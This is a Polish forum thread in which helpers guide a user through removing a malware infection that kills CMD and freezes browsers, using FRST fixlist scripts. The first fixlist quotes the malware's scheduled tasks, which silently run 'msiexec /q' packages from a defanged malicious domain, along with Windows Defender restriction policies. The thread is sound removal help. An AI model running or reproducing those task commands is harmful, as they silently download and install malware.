Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek dla www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

CMD sie wyłącza. Przeglądarki sie zawieszają.

08 Mar 2019 20:17 240 8
  • Poziom 3  
    Witam. Mam problem, gdy próbuje włączyć CMD automatycznie po sekundzie się wyłącza. Próbowałem ściągnąć FRST lecz przeglądarka się zawiesza, i EDGE i Opera. Tak samo jest gdy wpisuje w szukajke "kaspersky" itp . Siedzi w PC coś mądrego i nie wiem jak się tego pozbyć. Liczę na wasze wsparcie.
  • Poziom 3  
    Zwiecha programu podczas po 3 sekundach skanu...
  • Poziom 42  
    Otwórz notatnik systemowy i wklej:

    CloseProcesses:
    Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
    Task: {28EC4A26-837E-4F04-AFB3-5E50B6B3B439} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe /NOUACCHECK
    Task: {3AE478BB-95E3-421F-B7B7-A73BFF0E056F} - System32\Tasks\DeReporting => C:\Users\Zaq\AppData\Roaming\DeReporting\DeReporting.exe <==== UWAGA
    Task: {484E0B3F-6B79-41D6-85E9-27BC07A13BB9} - System32\Tasks\teeuliyke => "msiexec" /q -package hxxps://superdomain1709.info/dztgnpuutey.ljb <==== UWAGA
    Task: {5490E0BC-B117-4E3F-8658-72C2D2E20890} - System32\Tasks\eeeaa => "msiexec" -package hxxps://superdomain1709.info/eivere.nea /q <==== UWAGA
    Task: {6E8DC854-3376-4CD7-90ED-D693B0F6B9EB} - System32\Tasks\rqetticcrj => "msiexec" -package hxxps://superdomain1709.info/dyaycpweeypiezpeg.yis /q <==== UWAGA
    Task: {76DA1AED-A58A-4E9A-9F75-B905C0595D8B} - System32\Tasks\odibfakal => "msiexec" /q -package hxxps://superdomain1709.info/uqukry.vds <==== UWAGA
    Task: {A567A363-A5FE-4F4C-B64D-4A2FB7A4853A} - System32\Tasks\ileod => "msiexec" -package hxxps://superdomain1709.info/saeyjoeyouooyz.oei /q <==== UWAGA
    Task: {E466EA5D-8AF4-405B-A5CE-6E2C1DEF5764} - System32\Tasks\Opera scheduled Autoupdate 1545489624 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software)
    Task: {E8CEE2C8-8E4E-4606-A55F-90E2FB370B19} - System32\Tasks\zxpeosfmay => "msiexec" /q -package hxxps://superdomain1709.info/kfjmueowbvwyhikio.qro <==== UWAGA
    Hosts:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    BootExecute: autocheck autochk *
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    2018-12-23 13:32 - 2018-12-23 15:32 - 000000004 _____ () C:\ProgramData\lock.dat
    2018-12-23 13:32 - 2018-12-23 13:32 - 000000008 _____ () C:\ProgramData\ts.dat
    1601-01-03 21:26 - 1601-01-03 21:26 - 000174592 _____ (Microsoft Corporation) C:\Users\Zaq\AppData\Roaming\OhueUYy.exe
    2018-12-29 00:05 - 2018-12-29 00:06 - 006161408 _____ () C:\Users\Zaq\AppData\Local\dump007.dat
    1601-01-03 21:26 - 1601-01-03 21:26 - 000059904 _____ (Microsoft Corporation) C:\Users\Zaq\AppData\Local\qithEPi.exe
    2019-01-11 15:13 - 2019-01-11 15:34 - 000000131 _____ () C:\Users\Zaq\AppData\Local\uts.ini
    2018-12-23 13:15 - 2018-12-23 13:15 - 000000003 _____ () C:\Users\Zaq\AppData\Local\wbem.ini
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    Po wykonaniu zamieść nowe logi z FRST w trybie normalnym.
  • Poziom 42  
    Otwórz notatnik systemowy i wklej:

    CloseProcesses:
    Task: {4F8967F3-77C3-4E05-B886-77000EF6EA27} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
    Task: {68623D04-A984-46CE-B509-DEB5077F59E2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
    Task: {83051633-913C-4596-AC91-C07196635AB8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
    Task: {92986E42-4D48-4CCF-8128-577DFE80A54A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.
  • Spec od komputerów
    Wykonaj taki Fixlist.txt:
    Task: {5638B01A-1BC1-4C32-966F-E878A0ADCFE4} - System32\Tasks\{D7E3B97D-D2B1-8A21-3779-84E133E31661} => C:\Windows\UeOuoQbuANs.exe (Microsoft Corporation) [Brak podpisu cyfrowego]
    C:\Windows\UeOuoQbuANs.exe
    C:\Users\Zaq\AppData\Roaming\Opera Software\Opera Stable\Extensions\gdnmnimlojenlbhdjifnpbeiegfndnoo
    OPR Extension: (Adblocker for Youtube™) - C:\Users\Zaq\AppData\Roaming\Opera Software\Opera Stable\Extensions\gdnmnimlojenlbhdjifnpbeiegfndnoo [2018-12-23]
    OPR Extension: (Google™ Translator (web-extension)) - C:\Users\Zaq\AppData\Roaming\Opera Software\Opera Stable\Extensions\jgnebchahhepphmokjeohhoebakpfggp [2018-12-24]
    C:\Users\Zaq\AppData\Roaming\Opera Software\Opera Stable\Extensions\jgnebchahhepphmokjeohhoebakpfggp
    2019-03-08 22:33 - 2019-03-08 22:33 - 006161408 _____ C:\Users\Zaq\AppData\Local\dump007.dat

    Nastepnie zamiesc logi z trybu normalnego.